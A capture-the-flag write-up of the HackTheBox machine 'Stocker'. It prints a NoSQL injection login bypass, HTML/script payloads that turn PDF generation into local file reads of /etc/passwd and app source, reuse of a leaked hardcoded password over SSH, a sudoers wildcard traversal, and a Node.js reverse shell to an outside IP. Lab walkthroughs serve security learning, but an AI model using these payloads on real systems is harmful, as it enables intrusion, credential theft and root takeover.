# Stocker - HTB

[[_TOC_]]

## Summary

<!-- markdownlint-disable MD033 -->
<div align="center"><img width="560" height="424" src="images/0.png"></div>

Stocker is a nice easy-rated HTB machine created by [JoshSH](https://app.hackthebox.com/users/269501)

It starts with a NoSQL injection to bypass authentication.  
Then, we exploit PDF generation to get local file read via SSRF.  
For root, we abuse wildcard in `sudoers` with `../`

## Initial recon

```console
opcode@parrot$ nmap -v -p- 10.10.11.196
Nmap scan report for 10.10.11.196
Host is up (0.16s latency).
Not shown: 65408 closed tcp ports (reset), 125 filtered tcp ports (no-response)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
```

```console
opcode@parrot$ nmap -sC -sV -p 22,80 -oN stocker.nmap 10.10.11.196
Nmap scan report for 10.10.11.196
Host is up (0.16s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 3d:12:97:1d:86:bc:16:16:83:60:8f:4f:06:e6:d5:4e (RSA)
|   256 7c:4d:1a:78:68:ce:12:00:df:49:10:37:f9:ad:17:4f (ECDSA)
|_  256 dd:97:80:50:a5:ba:cd:7d:55:e8:27:ed:28:fd:aa:3b (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://stocker.htb
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

The usual SSH (22) and HTTP (80) ports are present.  

The website on port 80 redirects us to <http://stocker.htb>  
Hence, we can add this line to `/etc/hosts`:

```text
10.10.11.196 stocker.htb
```

The home page:

![1](images/1.png)

I couldn't anything interesting with dirbusting, so I tried to enumerate subdomains with `ffuf`:

```console
opcode@parrot$ ffuf -c -w ~/wordlists/subdomains-top1million-20000.txt -u http://stocker.htb -H "Host: FUZZ.stocker.htb" -r -fs 15463 2>/dev/null
dev                     [Status: 200, Size: 2667, Words: 492, Lines: 76, Duration: 740ms]
```

We should update `/etc/hosts`:

```text
10.10.11.196 stocker.htb dev.stocker.htb
```

I also enumerated the `dev` subdomain for directories with `ffuf`:

```console
opcode@parrot$ ffuf -c -w ~/wordlists/raft-small-words.txt -u http://dev.stocker.htb/FUZZ -mc all -fw 6 2>/dev/null
login                   [Status: 200, Size: 2667, Words: 492, Lines: 76, Duration: 206ms]
logout                  [Status: 302, Size: 28, Words: 4, Lines: 1, Duration: 111ms]
Login                   [Status: 200, Size: 2667, Words: 492, Lines: 76, Duration: 151ms]
static                  [Status: 301, Size: 179, Words: 7, Lines: 11, Duration: 115ms]
Logout                  [Status: 302, Size: 28, Words: 4, Lines: 1, Duration: 101ms]
stock                   [Status: 302, Size: 48, Words: 4, Lines: 1, Duration: 92ms]
Static                  [Status: 301, Size: 179, Words: 7, Lines: 11, Duration: 257ms]
LogOut                  [Status: 302, Size: 28, Words: 4, Lines: 1, Duration: 196ms]
LogIn                   [Status: 200, Size: 2667, Words: 492, Lines: 76, Duration: 168ms]
LOGIN                   [Status: 200, Size: 2667, Words: 492, Lines: 76, Duration: 91ms]
Stock                   [Status: 302, Size: 48, Words: 4, Lines: 1, Duration: 126ms]
STATIC                  [Status: 301, Size: 179, Words: 7, Lines: 11, Duration: 102ms]
```

## NoSQL injection

Visiting the `dev` subdomain redirects us to a login page at `/login`.  
We can try SQLi payloads, but they wouldn't work.  
`admin:admin` didn't work either.

We can also try NoSQL injection. Capture and send a login request to repeater.  
Change `Content-Type: application/x-www-form-urlencoded` to `Content-Type: application/json`  
Change the request body from `username=admin&password=admin` to:

```json
{"username":"admin","password":"admin"}
```

Next, we can try the standard NoSQLi payload:

```json
{"username":{"$ne":"opcode"},"password":{"$ne":"opcode"}}
```

It worked, and the response is a redirect to `/stock`.

![2](images/2.png)

We can repeat the same steps with an intercepted request, letting us access it in the browser.

## SSRF2LFR from PDF generation

The webpage at `/stock` is for shopping. We can add items to the card, view them and submit the final list.  
Upon submission, a PDF of the purchase order gets generated.

Running `exiftool` on the generated PDF we'd get:

```console
opcode@parrot$ exiftool document.pdf
ExifTool Version Number         : 12.16
File Name                       : document.pdf
Directory                       : .
File Size                       : 39 KiB
File Modification Date/Time     : 2023:01:15 01:08:17+05:30
File Access Date/Time           : 2023:01:15 01:08:16+05:30
File Inode Change Date/Time     : 2023:01:15 01:08:17+05:30
File Permissions                : rw-r--r--
File Type                       : PDF
File Type Extension             : pdf
MIME Type                       : application/pdf
PDF Version                     : 1.4
Linearized                      : No
Page Count                      : 1
Tagged PDF                      : Yes
Creator                         : Chromium
Producer                        : Skia/PDF m108
Create Date                     : 2023:01:14 19:30:40+00:00
Modify Date                     : 2023:01:14 19:30:40+00:00
```

Nothing interesting there.

Looking at the page source, we'd learn that there is a `/api` route.  
When we click on "Submit Purchase" button, it makes a post request to `/api/order` with the body:

```json
{
  "basket": [
    {
      "_id": "638f116eeb060210cbd83a8d",
      "title": "Cup",
      "description": "It's a red cup.",
      "image": "red-cup.jpg",
      "price": 32,
      "currentStock": 4,
      "__v": 0,
      "amount": 1
    }
  ]
}
```

To test for injection, I replaced it with:

```json
{
  "basket": [
    {
      "_id": "638f116eeb060210cbd83a8d",
      "title": "<u>Cup</u>",
      "description": "<u>It's a red cup.</u>",
      "image": "red-cup.jpg",
      "price": "<u>32</u>",
      "currentStock": "<u>4</u>",
      "__v": 0,
      "amount": "<u>1</u>"
    }
  ]
}
```

It broke the response as some parameters are expected to be numbers, but server received `NaN`. After excluding the numbers, I learnt that the `"title"` is vulnerable to HTML injection:

```json
{
  "basket": [
    {
      "_id": "638f116eeb060210cbd83a8d",
      "title": "<u>Cup</u>",
      "description": "It's a red cup.",
      "image": "red-cup.jpg",
      "price": 32,
      "currentStock": 4,
      "__v": 0,
      "amount": 1
    }
  ]
}
```

Testing payloads, we'd learn that Server XSS is possible. If we use this payload:

```json
{
  "basket": [
    {
      "_id": "638f116eeb060210cbd83a8d",
      "title": "<script>document.write(window.location)</script>",
      "description": "It's a red cup.",
      "image": "red-cup.jpg",
      "price": 32,
      "currentStock": 4,
      "__v": 0,
      "amount": 1
    }
  ]
}
```

We'd find that the item name in the purchase order PDF is now `file:///var/www/dev/pos/64a93efa4f3ad59879872e7a.html`  
We can extend it to read local files:

```json
{
  "basket": [
    {
      "_id": "638f116eeb060210cbd83a8d",
      "title": "<script>x=new XMLHttpRequest;x.onload=function(){document.write(btoa(this.responseText))};x.open('GET','file:///etc/passwd');x.send();</script>",
      "description": "It's a red cup.",
      "image": "red-cup.jpg",
      "price": 32,
      "currentStock": 4,
      "__v": 0,
      "amount": 1
    }
  ]
}
```

In the response, we'd find:

```text
cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaApkYWVtb246eDoxOjE6ZGFlbW9uOi91c3Ivc2JpbjovdXNyL3NiaW4vbm9sb2dpbgpiaW46eDoyOjI6YmluOi9iaW46L3Vzci9
```

It base64 decodes to:

```text
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/
```

The rest of the output is cut off.  
Instead, we can use an SSRF2LFR payload to read files:

```json
{
  "basket": [
    {
      "_id": "638f116eeb060210cbd83a8d",
      "title": "<iframe src=file:///etc/passwd></iframe>",
      "description": "It's a red cup.",
      "image": "red-cup.jpg",
      "price": 32,
      "currentStock": 4,
      "__v": 0,
      "amount": 1
    }
  ]
}
```

But the data was cut-off with this payload as well.  
I had the same issue with `<embed src=file:///etc/passwd>` and `<object data='file:///etc/passwd' type='text/plain'></object>`  
Eventually, I was able to get it to work with:

```json
{
  "basket": [
    {
      "_id": "638f116eeb060210cbd83a8d",
      "title": "<object data='file:///etc/passwd' type='text/plain' height='1000' width='600'></object>",
      "description": "It's a red cup.",
      "image": "red-cup.jpg",
      "price": 32,
      "currentStock": 4,
      "__v": 0,
      "amount": 1
    }
  ]
}
```

The contents:

```text
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System
(admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network
Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd
Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time
Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:112:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:113::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:114::/nonexistent:/usr/sbin/nologin
landscape:x:109:116::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core
Dumper:/:/usr/sbin/nologin
fwupd-refresh:x:112:119:fwupd-refresh
user,,,:/run/systemd:/usr/sbin/nologin
mongodb:x:113:65534::/home/mongodb:/usr/sbin/nologin
angoose:x:1001:1001:,,,:/home/angoose:/bin/bash
_laurel:x:998:998::/var/log/laurel:/bin/false
```

If I try to go for more height, it throws an Internal Server Error.  
I tried to look at the default nginx config (`file:///etc/nginx/sites-enabled/default`), but only got bits and pieces.  
But we already know the location of source code thanks to a previous payload.  
It is reasonable to assume that the main file is named `index.js`

```json
{
  "basket": [
    {
      "_id": "638f116eeb060210cbd83a8d",
      "title": "<object data='file:///var/www/dev/index.js' type='text/javascript' height='1000' width='600'></object>",
      "description": "It's a red cup.",
      "image": "red-cup.jpg",
      "price": 32,
      "currentStock": 4,
      "__v": 0,
      "amount": 1
    }
  ]
}
```

The source is:

```js
const express = require("express");
const mongoose = require("mongoose");
const session = require("express-session");
const MongoStore = require("connect-mongo");
const path = require("path");
const fs = require("fs");
const { generatePDF, formatHTML } = require("./pdf.js");
const { randomBytes, createHash } = require("crypto");

const app = express();
const port = 3000;

// TODO: Configure loading from dotenv for production
const dbURI =
"mongodb://dev:IHeardPassphrasesArePrettySecure@localhost/dev?authSource=admin&w=1";

app.use(express.json());
app.use(express.urlencoded({ extended: false }));
app.use(
	session({
		secret: randomBytes(32).toString("hex"),
		resave: false,
		saveUninitialized: true,
		store: MongoStore.create({
			mongoUrl: dbURI,
		}),
	})
);
app.use("/static", express.static(__dirname + "/assets"));

app.get("/", (req, res) => {
	return res.redirect("/login");
});

app.get("/api/products", async (req, res) => {
	if (!req.session.user) return res.json([]);

	const products = await mongoose.model("Product").find();
	return res.json(products);
});

app.get("/login", (req, res) => {
	if (req.session.user) return res.redirect("/stock");
	return res.sendFile(__dirname + "/templates/login.html");
});

app.post("/login", async (req, res) => {
	const { username, password } = req.body;
	if (!username || !password) return res.redirect("/login?error=login-error");

	// TODO: Implement hashing

	const user = await mongoose.model("User").findOne({ username, password });

	if (!user) return res.redirect("/login?error=login-error");

	req.session.user = user.id;

	console.log(req.session);

	return res.redirect("/stock");
```

We have hardcoded credentials in here, but no user named `dev` is present on the box.  
Instead, we can use it with the user `angoose` obtained from `/etc/passwd`:

```console
opcode@parrot$ sshpass -p 'IHeardPassphrasesArePrettySecure' ssh -o StrictHostKeyChecking=no angoose@stocker.htb
```

## Abusing wildcard in `sudoers` with `../`

```console
angoose@stocker:~$ sudo -l
Matching Defaults entries for angoose on stocker:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User angoose may run the following commands on stocker:
    (ALL) /usr/bin/node /usr/local/scripts/*.js
```

Since they have used a wildcard (`*`) in the path, we can abuse it by using `../` to reach a `.js` file we control.  
I created a reverse shell `opcode.js` in `/home/angoose`:

```js
(function(){
    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("bash", []);
    var client = new net.Socket();
    client.connect(9001, "10.10.14.28", function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /a/;
})();
```

```console
angoose@stocker:~$ sudo node /usr/local/scripts/../../../home/angoose/opcode.js
```

It gets us a shell as root:

```console
# id
uid=0(root) gid=0(root) groups=0(root)
```
